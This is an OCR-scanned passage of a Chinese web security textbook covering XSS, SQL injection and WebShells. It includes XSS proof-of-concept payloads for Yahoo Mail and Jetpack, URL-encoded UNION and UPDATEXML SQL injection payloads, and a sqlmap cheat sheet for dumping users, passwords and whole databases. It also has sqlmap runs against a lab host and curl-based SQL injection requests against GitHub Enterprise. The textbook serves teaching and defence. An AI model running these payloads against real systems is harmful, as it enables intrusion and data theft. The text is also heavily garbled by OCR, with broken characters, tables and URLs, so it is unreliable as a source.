首先 ， 发 送 一 封 带 有 所 有 已 知 HTML 标 签 的 邮件 进行 fuzz， 看 看 雅虎 邮箱 有 哪些 标签 没有 过 滤 。 观 察 雅 虎 邮箱 的 测试 结果 后 ， 你 会 注意 到 ， 如 果 boo| 型 的 HTML 属 性 赋予 了 值 ， 过 滤器 会 把 它 remove 
掉 ， 但 是 等 号 会 保留 下 来 。 


比如 : 














[NPUT TYPE-"checkbox" CHECKED-"hello" NAME-"check box"> 











A 








过 滤 后 : 














INPUT TYPE-"checkbox" CHECKED- NAME-"check box"» 











^ 








初 看 似乎 没什么 问题 ， 但 是 Web 浏 览 器 在 处 理 时 会 发 生 某 些 特别 的 变化 。 比 如 ， 在 checked 属 性 里 ， 默 认 等 于 check， 不 用 赋值 也 可 以 正常 显示 。 这 种 行为 是 基于 HTML 规 范 ， 在 不 带 引 号 的 属性 值 
里 ， 是 允许 无 字符 或 空格 字符 的 。 


这 个 特性 可 以 让 黑客 无 限制 地 插入 带 bool 属 性 的 HTML 标 签 ， 比 如 : 


Fft:0px;top:Opx; onmouseover-alert (/XSS/) //'» 








<img ismap='xxx' itemtype-'yyy style=width:100%;height:100%; position: fixed; let 





BR 


虎 邮 箱 过 滤 后 : 


«img ismap-itemtype-yyy style=width:100%;height:100%; position: fixed; left: 0px; top:0px; onmouseover-alert (/XSS/) //» 








这 封 带 POC 的 邮件 ， 使 整个 浏览 器 被 img 标 记 占 满 整 个 窗口 。Javascript 代 码 的 onmouseover 属 性 值 将 即时 执行 ， 不 会 与 用 户 进 行进 一 步 的 交互 。 在 邮件 设置 里 茶 止 或 允许 图 像 ， 都 不 能 阻止 该 攻击 。 
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图 4-7 ”WordPress 插件 Jetpack 


2016 年 5 月 ，WordPress 母 公司 Automattic 发 布 了 插件 Jetpack 4.0.3 版 本 ， 见 图 4-7， 在 这 个 官方 的 WordPress 论 坛 插件 的 版 本 中 ， 修 复 了 一 个 威胁 程度 较 高 的 存储 型 XSS 漏 洞 ， 小 于 4.0.3 的 版 本 都 会 


该 漏洞 是 一 个 存储 型 XSS 漏 洞 ， 攻 击 者 可 以 利用 漏洞 在 Web 平 台中 植 入 恶意 代码 ， 而 恶意 代码 会 被 存储 于 后 台数 据 库 中 ， 随 后 当 其 他 用 户 访 问 受 影响 页 面 时 ， 便 会 执行 攻击 者 植 入 的 恶意 代码 ， 从 而 实 
现 XSS 攻 击 。 


该 XSS 漏 洞 存 在 于 插件 的 短 代码 (shortcode embeds) 模块 中 ，wordpress shortcode 是 指 一 些 使 用 “[]” 包 含 的 短 代码 ， 例 如 ”[vimeo123]”， 而 Jetpack 的 shortcode 模 块 能 够 将 [vimeo 123] 蔡 换 
成 男 外 一 个 链接 ,创建 了 一 个 启 套 链接 的 HTML 结 构 。wordpress 会 识别 这 些 短 代码 并 根据 短 代码 的 定义 输出 特定 的 内 容 ， 简 单 易 用 ， 功 能 强大 。 


在 评论 中 输入 如 下 载荷 即 会 触发 漏洞 : 


«a title=' [vimeo 123]'><abbr title-'onmouseover-"alert (1338) ;"'>a7</a> 





因为 title 属 性 右边 的 单 引号 被 转 义 ， 直 到 遇 到 abbr 标 签 的 title 单 引号 为 止 ， 从 而 导致 了 弹 窗 出 现 。 在 Sucuri 安 全 团队 向 Jetpack 的 管理 者 报告 了 该 漏洞 不 久 ，Jetpack 4.0.3 修 复 版 本 发 布 ， 修 复 版 本 中 通 
过 避免 标签 属性 中 的 短 代码 被 解释 ， 从 而 解决 了 该 问题 。 





<p><a title=" 
«div class-"embed-vimeo" style-"text-align: center;"><iframe src-"https://player.vimeo.com/video/123" width-"474" height-"267" frameborder="0" webkitallowfullscreen mozallowful 
' rel="nofollow"><abbr title-' onmouseover="alert (1338) ;"'>a7</abbr></a></p> 




















4.0 SQL 注入 概述 


所 谓 SQL 注 入 ， 就 是 通过 把 SQL 命令 插入 到 Web 表 单 提交 或 输入 域名 或 页 面 请 求 的 查询 字符 串 ， 最 终 达到 欺骗 服务 器 执行 恶意 的 SQL 命令 。 具 体 来 说 ， 它 是 利用 现 有 应 用 程序 ， 将 SQL 命令 注入 到 后 人 台 
数据 库 引擎 执行 的 能 力 ， 比 如 先前 的 很 多 影视 网 站 泄露 VIP 会 员 密码 大 多 就 是 通过 Web 表 单 递交 查询 字符 曝 出 的 ， 这 类 表单 特别 容易 受到 SQL 注入 攻击 。 对 照 OWASP 2013 报 告 ， 在 最 新 发 布 的 OWASP 
2017 报 告 中 ，SQL 注 入 依然 是 排名 第 一 的 Web 威 胁 ( 见 图 4-8) 。 


OWASP Top 10 - 2013 (旧版 ) OWASP Top 10 - 2017 (#thk) 
A1 -注入 A1 -注入 
A2 - 失效 的 身份 认证 和 会 话 管理 A2 -失效 的 身份 认证 和 会 话 管理 
A3 - 跨 站 脚本 (XSS) | linc (XSS) 
象 引 用 - 与 A7 合 并 


A5 DARENA 


- — etg A6 -敏感 信 eu 
A7 GEGEN -与 A4 合 并 
A8 - 跨 站 请 求 伪造 (CSRF) A8 A8 - 跨 站 请 求 伪造 (CSRF) 
A9 -使 用 含有 已 知 漏洞 的 组 件 A9 SSSENCHNNTEBIE 
A10 -未 验证 的 重 定向 和 转发 





图 4-8 OWASP 2017 TOP10 网 站 威胁 


当 应 用 程序 直接 使 用 输入 内 容 来 构造 动态 SQL 语 句 以 访问 数据 库 时 ， 会 发 生 SQL 注 入 攻击 。 如 果 代码 使 用 存储 过 程 ， 而 这 些 存储 过 程 作为 包含 未 筛选 的 用 户 输入 的 字符 串 来 传递 ， 也 会 发 生 SQL 注 入 。 
SQL 注 入 可 能 导致 攻击 者 使 用 应 用 程序 登录 并 在 数据 库 中 执行 命令 。 相 关 的 SQL 注 入 可 以 通过 测试 工具 sqlmap 进 行 。 如 果 应 用 程序 使 用 特权 过 高 的 帐户 连接 到 数据 库 ， 这 种 问题 会 变 得 很 严重 。 在 某 些 表 单 
中 ， 用 户 输入 的 内 容 直 接 用 来 构造 动态 SQL 命令 ， 或 者 作为 存储 过 程 的 输入 参数 ， 这 些 表单 特别 容易 受到 SQL 注入 攻击 。 而 许多 网 站 程序 在 编写 时 ， 没 有 对 用 户 输入 的 合法 性 进行 判断 或 者 程序 中 本 身 的 变 
量 处 理 不 当 ， 使 应 用 程序 存在 安全 隐患 。 这 样 ， 用 户 就 可 以 提交 一 段 数据 库 查 询 的 代码 ， 根 据 程 序 返 回 的 结果 ， 获 得 一 些 敏感 的 信息 或 者 控制 整个 服务 器 ,于 是 SQL 注 入 就 发 生 了 .。 


SQL 注 入 虽然 是 个 古老 的 攻击 方式 ， 但 是 直到 现在 依然 是 互联 网 安全 的 一 大 威胁 ， 由 SQL 注 入 导致 的 拖 库 、 远 程控 制 依然 困扰 着 各 大 互联 网 公司 ， 如 图 4-9 所 示 。 


总 共 搜 索 到 8095 条 结果 ， 显示 第 1 - 10 记录 


ID 发 布 时 间 关注 奖励 — 标题 

wooyun-2016-0222273 2016-06-23 5 人 人 网 某 处 SQL 注 入 影响 大 量 数据 

wooyun-2016-0221605 2016-06-21 万 惠 金 融 PPmoney 平 台 存在 SQI 注 入 (可 能 涉及 敏感 数据 ) 
wooyun-2016-0221041 2016-06-20 天 弘 基金 主 站 存在 MySql 注 入 

wooyun-2016-0219921 2016-06-16 新 浪 乐 居 某 系统 存在 SQL 注 入 漏洞 

wooyun-2016-0218066 2016-06-10 51job 分 站 存在 SQL 注入 

wooyun-2016-0217072 2016-06-08 安 智 网 某 站 SQL 注入 到 Getshell 

wooyun-2016-0216810 2016-06-06 智慧 医疗 安全 之 云 信 医 疗 主 站 SQL 注入 /DBA 权 限 /涉及 近 500W+ 用 户 数据 
wooyun-2016-0214867 2016-05-31 智慧 医疗 安全 之 医事 通 WWW 主 站 SQL 注入 (涉及 近 500W+ 用 户 信息 ) 


wooyun-2016-0214794 2016-05-31 oppo 软 件 商 店 Mysql 弱 口令 引发 的 血案 (影响 用 户 信 息 与 APP 下 载 地 址 等 ) 


wooyun-2016-0214076 2016-05-29 OPPO 手 机 hk 主 站 报错 SQL 注入 (已 Getshell 





图 4-9 乌云 2016 年 SQL 注入 漏洞 列表 举例 


42.1. 常见 SQL 注 入 攻击 


1. 强 制 产 生 错 误 


对 数据 库 类 型 、 版 本 等 信息 进行 识别 是 此 类 型 攻击 的 动机 所 在 。 它 的 目的 是 收集 数据 库 的 类 型 、 结 构 等 信息 为 其 他 类 型 的 攻击 做 准备 ， 可 谓 是 攻击 的 一 个 预备 步 又。 利用 应 用 程序 服务 器 返回 的 默认 错 
误 信息 而 取得 漏洞 信息 。 


2. 采 用 非 主流 通道 技术 


除 HTTP 响 应 外 ， 还 能 通过 通道 获取 数据 ， 然 而 ， 通 道 大 多 依赖 于 数据 库 支持 的 功能 而 存在 ， 所 以 这 项 技术 不 完全 适用 于 所 有 的 数据 库 平台 。SQL 注 入 的 非 主流 通道 主要 有 E-mail、DNS 以 及 数据 库 连 
接 ， 基 本 思想 为 : 先 对 SQL 查 询 打 包 ， 然 后 借助 非 主 流通 道 将 信息 反馈 至 攻击 者 。 


3. 使 用 特殊 的 字符 


不 同 的 SQL 数据 库 有 许多 不 同 的 特殊 字符 和 变量 ， 通 过 某 些 配置 不 安全 或 过 滤 不 细致 的 应 用 系统 能 够 取得 某 些 有 用 的 信息 ， 从 而 对 进一步 攻击 提供 方向 。 


4. 使 用 条 件 语句 


此 方式 具体 可 分 为 基于 内 容 、 基 于 时 间 、 基 于 错误 3 种 形式 。 一 般 在 经 过 常规 访问 后 加 上 条 件 语句 ， 根 据 信息 反 馈 来 判定 被 攻击 的 目标 。 


5. 利 用 存储 过 程 


通过 某 些 标 准 存 储 过 程 ， 数 据 库 厂商 在 对 数据 库 的 功能 进行 扩展 的 同时 ， 操 作 系 统 也 可 与 数据 库 进 行 交互 。 部 分 存储 过 程 可 以 让 用 户 自行 定义 。 通 过 其 他 类 型 的 攻击 收集 数据 库 的 类 型 、 结 构 等 信息 之 
便 能 够 构建 执行 存储 过 程 的 命令 。 这 种 攻击 类 型 往往 能 达到 远程 命令 执行 、 特 权 扩张 、 拒 绝 服务 等 目的 。 


6. 避 开 输 入 过 滤 技 术 


虽然 对 于 通常 的 编码 都 可 利用 某 些 过 滤 技 术 进 行 SQL 注 入 防范 ， 但 是 此 种 情况 下 ， 也 有 许多 方法 可 以 避 开 过 滤 。 一 般 可 达到 此 目的 的 技术 手段 包括 : SQL 注释 和 动态 查询 的 使 用 ， 利 用 截断 ，URL 编 码 与 


空 字 节 的 使 用 ， 大 小 写 变种 的 使 用 ， 以 及 谋 套 剥离 后 的 表达 式 等 等 。 借 助 这 些 手段 ， 输 入 构思 后 的 查询 可 以 避 开 输入 过 滤 技 术 ， 从 而 使 攻击 者 获得 想 要 的 查询 结果 。 


Pa 


7. 推 断 技术 


该 技术 能 够 明确 数据 库 模 式 、 提 取 数 据 以 及 识别 可 注入 参数 。 此 种 方式 的 攻击 通过 网 站 ， 对 用 户 输入 的 反馈 信息 、 可 注入 参数 、 数 据 库 模式 等 进行 推断 。 这 种 攻击 构造 的 查询 ， 执 行 后 获得 的 答案 只 有 
真 、 假 两 种 。 基 于 推断 的 注入 方式 主要 分 为 时 间 测 定 注入 与 盲 注入 两 种 。 时 间 测 定 注入 是 在 注入 语句 里 加 入 诸如 “waitfor 100” 的 语句 ， 按 照 此 查询 结果 出 现 的 时 间 ， 对 注入 能 否 成 功 和 数据 值 光 围 的 推导 
J 判定 ， 盲 注入 主要 包括 “and |=|”、“and |=2” 两 种 经 典 注 入 方法 。 这 些 方 式 均 是 对 一 些 间接 关联 且 能 取得 回应 的 问题 进行 提问 ， 进 而 通过 响应 信息 推断 出 想 要 的 信息 ， 然 后 进行 攻击 。 


4.2.2 ”党 见 SQL 注 入 攻击 载体 


常见 SQL 注 入 攻击 载荷 如 下 : 


/wp-login.php?action-lostpassword$25$27$20O0RDER$20BY$201$23 
/wp-content/themes/begin/timthumb.php?src-http£$3A$2F$2Fwww.lawqt.com$2Fwp-conten 
t$2Fuploads$2F2017$2F032$2F12.png&w--96112$22$20UNION220ALL$20SELECT£220830322C2208 
303$2C$208303$2C$208303$2C$208303$2C$208303$2C$208303$2C$208303--$20&h-2210&zc-1 
/newmessage.php?tosys=1 &title=1%22%20AND%20UPDATEXML%283114%2CCONCAT%280x2e%2C0x 
3a6e676f3a$2C$28SELECT2$20$28CASE$20WHEN£2202283114£23D3114229220 THEN2201220ELSE$20 
0$20END229$29$2C0x3a72627793a$29$2C6430$29$20$20AND$20$22En1i$22£$3D$22Enli 
/wpo-login.php?action=Llostpassword%25%27%29%20LIMIT%201%2C1%20UNION%20ALL%20SELEC 
T$20NULL$2C$20NULL$2C$20NULL$2C$20NULL$2C$20NULL$2C$20NULL$2C$20NULL$2C$20NULL$£2 
C$20NULL$2C$20NULL2C$20NULL$2C$20NULL$2C$20NULL$23 
/wp-content/themes/begin/timthumb.php?src-http£$3A$2F$2Fwww.lawqt.com$2Fwp-conten 
tS2Fuploads%2F2017%2F03%2F12 .png&w=-2372%22%20UNION%S20ALL%20SELECT%S202985%2C%202 
985$2C$202985$2C$202985$2C$202985$2C$202985$2C$202985$2C$202985$2C$202985$2C$202 
98522C2$202985--$20&h-210&zc-1 
/wp-login.php?action-lostpassword£$25$27£$29$20LIMIT$201952C1$20UNION£20ALL£20SELEC 
T$20NULL$2C220NULL$2C£$20NULL$2C$20NULL£2C$20NULL$2C20NULL$2C£$20NULL$2C$20NULL$2 
C$20NULL22C£220NULL$2C£$20NULL$2C$20NULL£23 
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4.2.3 SQL 常见 工具 


1.sqlmap 


sqlmap 是 一 款 用 来 检测 与 利用 SQL 注入 漏洞 的 免费 开源 工具 ， 它 有 一 个 非常 棒 的 特性 ， 即 对 检测 与 利用 的 自动 化 处 理 (数据 库 指纹 、 访 问 底层 文件 系统 、 执 行 命令 ) 。 读 者 可 以 通过 位 于 SourceForge 


的 官方 网 站 下 载 sqlmap 源 码 ( 见 图 4-10) : http://sourceforge.net/projects/sqlmap/,. 


python sqlmap.py -u "http://debiandev/sqlmap/mysql/get int.php?id-1" --batch 


{1.6.5.63#dev} 


http: //sqlmap.org 


[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent i 

illegal. It is the end user's responsibility to obey all applicable local, state and fed 
eral Laws. Developers assume no Liability and are not responsible for any misuse or damage 
caused by this program 


[*] starting at 17:43:06 


[17:43:06] [INFO] testing connection to the target URL 

[17:43:06] [INFO] heuristics detected web page charset ‘ascii' 

[17:43:06] [INFO] testing if the target URL is stable 

[17:43:07] [INFO] target URL is stable 

[17:43:07] [INFO] testing if GET parameter ‘id' is dynamic 

[17:43:07] [INFO] confirming that GET parameter 'id' is dynamic 

[17:43:07] [INFO] GET parameter ‘id' is dynamic 

[17:43:67] [INFO] heuristic (basic) test shows that GET parameter ‘id' might be injectable 
(possible - IL") 





图 4-10 sqlmap h A 


也 可 以 使 用 git 来 获取 : 





git clone https://github.com/sqimapproject/sqlmap.git sqlmap-dev 





sqlmap 常 见 命令 : 












































































































































































































































sqimap -u "http://url/news?Id-1" -dbms "mysql" -users # doms 指定 数据 库 类 型 

sqimap -u "http://url/news?Id-1" -users # 列 数据 库 用 户 

sqlmap -u "http://url/news?Id-1" -dbs# 列 数据 库 

sqimap -u "http://url/news?Id-1" -passwords # 数 据 库 用 户 密码 

sqimap -u "http://url/news?Id-1" Bocas root -v 0 pe eee 

sqlmap -u "http://url/news?Id-1" -dump -c "password, user, i -t "tablename"-d "db name"-start 1 -stop 20 # 列 出 指定 字段 ， 列 出 20 条 
Sqlmap -u "http://url/news?Id-l" -dump- all -v 0 NATURE EHE PITE i 
sqlmap -u "http://url/news?Id-1" -privileges # 碍 看 权限 

sqlmap -u "http://url/news?ld-l" -privileges -u root # 得 看 指定 用 户 权限 

sqimap -u “http://url/news?Id=1" -is-dba -v 1 # 是 否 是 数据 库 管 理 员 

sqimap -u "http://url/news?Id-1" -roles # 枚 举 数据 库 用 户 角 色 

sqlmap -u "http://url/news?Id-1" -udf-inject # 导 入 用 户 自 定义 函数 〈 获 取 系统 权限 ! ) 

Sqlmap -u "http://url/news?Id=1" -dump-all -exclude-sysdbs -v 0 # 列 出 当前 库 所 有 表 
sqlmap -u "http://url/news?Id-1" -union-cols #union 查询 表 记 录 

sqlmap -u "http://url/news?Id-1" -cookie "cookie _Value"#cookie 注 入 

sqlmap -u "http://url/news?Id-1" -b # 歼 取 banner 信 息 

sqlmap -u "http://url/news?Id-1" -data "id- 3"#post -注入 

sqlmap -u "http://url/news?ld-1" -vy 1 -f # 指 纹 判别 数据 库 类 型 
























































以 WAVSEP 靶 场 为 例 演示 sqlmap 强 大 功能 。 存 在 SQL 注入 漏洞 的 链接 为 : 
































http://182.61.11.23:8080/wavsep/active/SInjection-Detection-Evaluation-GET-500Error/Case01-InjectionInLogin-String-LoginBypass-WithErrors.jsp?username-textvalue&password-textve 











其 中 注入 点 是 username 字 段 。 


C 获取 数据 库 类 型 : 





























./sqlmap.py -u "http://182.61.11.23:8080/wavsep/active/SInjection-Detection-Evaluation-GET-500Error/Case01-InjectionInLogin-String-LoginBypass-WithErrors.jsp?username-textvalue 
































[0:45:03] [INFO] the back-end DBMS is MySQL 

b application technology: JSP 

ck-end DBMS: MySQL >= 5.0 

10:45:03] [INFO] fetched data logged to text files under '/Users/liu.yan/.sqlmap/output/182.61.11.23' 
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C 获取 数据 库 用 户 列表 : 


























./sqlmap.py -u "http://182.61.11.23:8080/wavsep/active/SInjection-Detection-Evaluation-GET-500Error/Case01-InjectionInLogin-String-LoginBypass-WithErrors.jsp?username-textvalue 




















database management system users [1]: 
[*] 'wavsep'@'localhost' 


[10:51:26] [WARNING] HTTP error codes detected during run: 
500 (Internal Server Error) - 4 times 
[10:51:26] [INFO] fetched data logged to text files under '/Users/liu.yan/.sqlmap/output/182.61.11.23' 












































[*] shutting down at 10:51:26 





C 获取 数据 库 列 表 : 





./sqimap.py -u "http://182.61.11.23:8080/wavsep/active/sS] 








[njection-Detection-] 





Evaluation-G 


ET-500 








Error/Case01- 








Injection] 








[nLogin-String-Login 





Bypass-Withl 





Errors.jsp?username-textvalue 
































返回 结果 : 
0:54:51] [INFO] fetching database names 
0:54:52] [INFO] the SQL query used returns 2 entries 
0:54:52] [INFO] retrieved: information schema 
0:54:52] [INFO] retrieved: wavsepDB 


available databases [2]: 
[*] information schema 
[*] wavsepDB 

















- 获取 指定 数据 库 指 定 表 的 全 部 数据 : 





./sqimap.py -u "http://182.61.11.23:8080/wavsep/active/S] 








[njection-Detection-J 





Evaluation-G 


ET-500 








Error/Case01-] 











[Injection] 





[nLogin-String-Login 





Bypass-Withl 





Errors.jsp?username-textvalue 











Database: wavsepD 
Table: users 





















































[7 entries] 
十 一 一 一 一 一 一 一 一 十 一 一 一 一 一 一 一 一 一 一 十 一 一 一 一 一 一 一 一 一 一 一 一 十 一 一 一 一 一 一 一 一 一 一 一 十 
userid username | password privilege 
十 一 一 一 一 一 一 一 一 十 一 一 一 一 一 一 一 一 一 一 十 一 一 一 一 一 一 一 一 一 一 一 一 十 一 一 一 一 一 一 一 一 一 一 一 十 
1 userl password 1 
2 david goodboy 1 
3 admin mastermold | 5 
4 user4 password4 1 
5 user5 password5 2 
6 user6 password6 ] 
7 user7 password7 
十 一 一 一 一 一 一 一 一 十 一 一 一 一 一 一 一 一 一 一 十 一 一 一 一 一 一 一 一 一 一 一 一 十 一 一 一 一 一 一 一 一 一 一 一 十 
1:10:05] [INFO] table 'wavsepDB.users' dumped to CSV | 
1:10:05] [INFO] fetched data logged to text 
[*] shutting down at 11:10:05 








: 获取 指定 数据 库 的 全 部 数据 : 


file '/Users/liu.yan/.sqlmap/output/182.61 
files under '/Users/liu.yan/.sqlmap/output/182.61.11.23' 





L.11.23/dump/wavsepDl 





B/users.csv' 





./sqimap.py -u "http://182.61.11.23:8080/wavsep/active/S] 












































返回 结果 : 
[11:05:30] [INFO] resumed: 8 
Database: wavsepDB 
Table: transactions 
[8 entries] 
十 一 一 一 一 一 一 一 一 十 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 十 一 一 一 一 一 一 一 十 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 
userid | transactionId | sum description 
十 一 一 一 一 一 一 一 一 十 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 十 一 一 一 一 一 一 一 十 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 
1 132 1000 Simple Transaction 
2 133 1200 Simple Transaction 
3 135 3000 Simple Transaction 
4 223 4000 Simple Transaction 
5 423 5000 Simple Transaction 
6 456 6000 Simple Transaction 
7 789 7012 Expensive Transaction 
8 895 8000 Expensive Transaction 
十 一 一 一 一 一 一 一 一 十 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 十 一 一 一 一 一 一 一 十 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 
[*] shutting down at 11:05:30 





[njection-Detection-Jl 





Evaluation-G 





ET-500 





Error/Case01- 












































十 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 十 
transactionDate 

十 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 十 
2010-01-01 
2010-01-01 
2010-01-01 
2010-01-01 
2010-01-01 
2010-01-01 
2010-01-01 
2010-02-02 

十 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 十 





Injection] 





[nLogin-String-Login 





Bypass-Withl 








Errors.jsp?username-textvalue 





2.HAVIJ 


HAV1J 是 一 款 自动 化 的 SQL 注入 工具 ， 其 界面 见 图 4-11， 它 能 够 帮助 渗透 测试 人 员 发 现 和 利用 Web 应 用 程序 的 SQL 注入 漏洞 。 





e Havij - 








Target http://www.target.com/index.asp?id=123 > il 
p 

— Cima bos] ham Pave 

"E — — J wo = as) oo 


Load Save 


f O D » os 6 àw& » X 
About Info Tables Resad Files Write File Cmd Shell Query Find Admin MD5 Settir 


Havij - Advanced SQL Injection Tool 


Version 1.17 Pro 


Havij 1.17 Pro! 





图 4-11 HAVIJ 界 面 图 


支持 的 检测 类 型 包括 : 


- MSSQL 2000/2005 with error; 


- MSSQL 2000/2005 no-error union-based ; 


- MSSQL blind; 


: MSSQL time-based; 


: MySQL union-based; 


- MySQL blind; 


: MySQL error-based ; 





: MySQL time-based ; 


- Oracle union-based ; 


- Oracle ertot-based ; 


- Oracle blind; 


* PostgreSQL union-based ; 


: MS Access union-based ; 


: MS Access blind; 


: Sybase (ASE) ; 


- Sybase (ASE) Blind. 


4.2.4. 近年 典型 SQL 注入 事件 分 析 


1.wordpress SEO 插件 曝 出 危 SQL 注 入 漏洞 


2015 年 ， 全 球 最 流行 的 CMS 应 用 wordpress 揪 件 ( 见 图 4-12) wordpress SEO by Yoast 曝 出 高 危 SQL 注入 漏洞 ， 该 插件 使 用 频率 相当 高 ， 用 户 高 达 上 干 万 。wordpress SEO by Yoast 揪 件 是 
wordpress 平 台 下 非常 流行 的 SEO 插件 ， 在 Yoast 网 站 上 拥有 1400 万 次 的 下 载 量 。 该 漏洞 是 wordpress 漏 洞 扫 描 器 “WPScan” 开 发 者 Ryan Dewhurst 发 现 的 一 一 1.7.3.3 之 前 版 本 的 wordpress SEO by 
Yoast 都 会 受到 SQL 盲 注 Web 应 用 程序 漏洞 的 影响 。SQL 注 入 漏洞 之 所 以 被 标记 为 高 危 漏洞 ， 是 因为 它 可 能 会 导致 大 量 数据 和 敏感 信息 泄露 。 通 常 ， 在 SQL 注入 攻击 中 ， 攻 击 者 会 通过 客户 端 在 应 用 程序 中 输 
入 一 个 畸形 的 SQL 请 求 。 


WORDPRESS 





图 4-12 ”wotdptress 插 件 SEO 


该 漏洞 仅 影响 wordpress 内 部 用 户 ， 因 为 该 漏洞 存在 于 admin/class-bulk-editor-list-table.php 文 件 中 ， 而 此 文件 只 有 wordpress 管 理 员 、 编 辑 和 特权 作者 才能 访问 。 为 了 成 功利 用 这 一 漏洞 ， 攻 击 者 
需要 从 授权 用 户 (管理 员 、 编 辑 、 作 者 ) 处 着 手 。 当 然 授权 用 户 是 不 会 乖乖 帮 你 攻击 东家 的 ， 这 就 需要 社会 工程 学 的 帮助 了 ， 攻 击 者 可 以 欺骗 用 户 进入 一 个 精心 编写 的 URL 中 ， 如 果 授 权 用 户 成 为 了 此 次 攻 
击 的 受害 者 ， 那 么 攻击 者 就 可 利用 此 漏洞 在 受害 者 的 wordpress 网 站 上 执行 任意 SQL 请 求 。 


Ryan 提供 了 一 个 SQL 言 注 漏洞 的 poc: 


http: //victim-wordpress-website.com/wp-admin/admin.php?page=wpseo bulk-editor&type-title&orderby-post date$2c (select%20*%20from%20 (select (sleep (10) ) ) a) &order-asc 





2.GitHub 企 业 版 SQL 注 入 漏洞 


2017 年 GitHub 企 业 版 ( 见 图 4-13) 被 曝 出 具有 SQL 注入 漏洞 。 这 个 SQL 注入 漏洞 存在 于 GitHub 企 业 版 程序 的 PreReceiveHookTarget 模 块 中 ， 其 根本 原因 在 
¥/data/GitHub/current/app/model/pre_receive hook target.rb 文 件 的 第 45 行 : 





ithub 


图 4-13 github } 











scope :sorted by, -» (order, direction = nil) { 
direction = "DESC" == "#{direction}".upcase ? "DESC" : "ASC" 
select (««-SQL) 
#{table name}.*, 
CASE hookable type 
WHEN 'global' THEN 0 
WHEN 'User' THEN 1 
WHEN 'Repository' THEN 2 
END AS priority 



































SOL 





.joins ("JOIN pre receive hooks hook ON hook id = hook.id") 
. readonly (false) 
.order([order, direction] .join(" ")) 








虽然 Rails 中 内 置 的 对 象 关系 映 射 ActiveRecord in Rails 本 身 不 允许 SQL 注入 操作 ， 但 一 些 ActiveRecord 的 误 用 实例 同样 会 引起 SQL 注入 。 在 该 漏洞 情况 中 ， 我 们 可 以 控制 order 方 法 的 参数 实现 恶意 代码 
注入 。 跟 踪 观 察 发 现 ， 服 务 sorted_by 被 data/GitHub/current/app/api/org_pre_receive_hooks.rb 文 件 的 第 61 行 调用 : 





get "/organizations/:organization id/pre-receive-hooks" do 
control access :list org pre receive hooks, rg => org = find org! 
(documentation url << "#list-pre-receive-hooks" 
targets PreReceiveHookTarget.visible for hookable (org) 
targets = sort (targets) .paginate (pagination) 
github: :PrefillAssociations.for pre receive hook targets targets 


deliver :pre receive org target hash, targets 

































































end 
def sort (scope) 

scope.sorted by("hook.#{params[:sort] || "id"}", params[:direction] || "asc") 
end 





可 以 清楚 地 看 到 params[: sort] 被 传递 给 了 scope.sorted_by， 所 以 我 们 可 以 尝试 着 向 params[: sor] 注 入 恶意 代码 。 在 触发 该 漏洞 之 前 ， 接 入 API 需 要 admin: pre receive hoki Elie —/ 35 
access token 值 ， 我 们 可 以 通过 以 下 命令 来 获取 : 





$ curl -k -u 'nogg:nogg' 'https://192.168.187.145/api/v3/authorizations' \ 
-d '["scopes":"admin:pre receive hook","note":"x"]' 











vid" 4; 
"url": "https://192.168.187.145/api/v3/authorizations/4", 
"app" : { 
"name" : "XU, 
"url": "https://developer.github.com/enterprise/2.8/v3/oauth authorizations/", 










































































"client id": "00000000000000000000" 
hr 
"poken" T2072?" 
"hashed token": "1135d1310cbe67ae931ff7ed8a09d7497d4cc008ac730f2f7£7856dc5d6b39f4", 
"token last eight": "lfadac36", 
"note" : We 
"note url": null, 
"created at": "2017-01-05T22:17:322", 
"updated at": "2017-01-05T22:17:322", 
"scopes": [ 


"admin:pre receive hook" 


l, 


"fingerprint": null 








一 旦 获取 到 有 效 的 access token 值 之 后 ， 漏 洞 就 会 被 触发 : 








S curl -k -H 'Accept:application/vnd.github.eye-scream-preview' \ 
'https://192.168.187.145/api/v3/organizations/l/pre-receive-hooks?access token-????????&sort-id, (selectt1+from+tinformation schema.tablest+limit+1,1)' 




















[ 

] 

S curl -k -H 'Accept:application/vnd.github.eye-scream-preview' \ 
'https://192.168.187.145/api/v3/organizations/l/pre-receive-hooks?access token-????????&sort-id, (select+1+fromtmysql.user+tlimit+1,1)' 














"message": "Server Error", 
"documentation url": 
"https: //developer.github.com/enterprise/2.8/v3/orgs/pre receive hooks" 




















curl -k -H 'Accept:application/vnd.github.eye-scream-preview' \ 
ttps://192.168.187.145/api/v3/organizations/l/pre-receive-hooks?access token-????????&sort-id,if (user ()="github@localhost", sleep (5) ,user()) 














一 一 -tm 一 


4.3 ”WebShell 概 述 


WebShell 就 是 以 ASP、PHP、JSP 或 者 CGI 等 网 页 文件 形式 存在 的 一 种 命令 执行 环境 ， 也 可 以 将 其 称 为 一 种 网 页 后 门 。 黑 客 在 入 侵 了 一 个 网 站 后 ， 通 常会 将 ASP 或 PHP 后 门 文件 与 网 站 服务 器 Web 目 录 
下 正常 的 网 页 文件 混在 一 起 ， 然 后 就 可 以 使 用 浏览 器 来 访问 ASP 或 者 PHP 后 门 ， 得 到 一 个 命令 执行 环境 ， 从 而 达到 控制 网 站 服务 器 的 目的 。 


顾名思义 ，“Web” 的 合 义 显然 是 需要 服务 器 开放 Web 服 务 ，“shell” 的 含义 是 取得 对 服务 器 某 种 程度 上 的 操作 权限 。 由 于 WebShell 大 多 是 以 动态 脚本 的 形式 出 现 ， 也 有 人 称 之 为 “网 站 的 后 门 工 
具 ”。2016 年 乌云 列 出 的 Webshell 事 件 如 图 4-14 所 示 。 


ID 发 布 时 间 奖励 å 标题 
wooyun-2016-0204285 ^ 2016-05-02 幸福 人 寿 某 系统 漏洞 涉及 全 部 代理 人 信息 /后 台 沦陷 /大 量 客户 信息 /发 现 webshell 
wooyun-2016-0186223 ^ 2016-03-18 P2P 爹 融 安 全 之 银联 商务 某 站 SQL 注入 到 webshell 


wooyun-2016-0172069 ^ 2016-03-10 D 盾 WebShell 上 传 拦截 bypass 

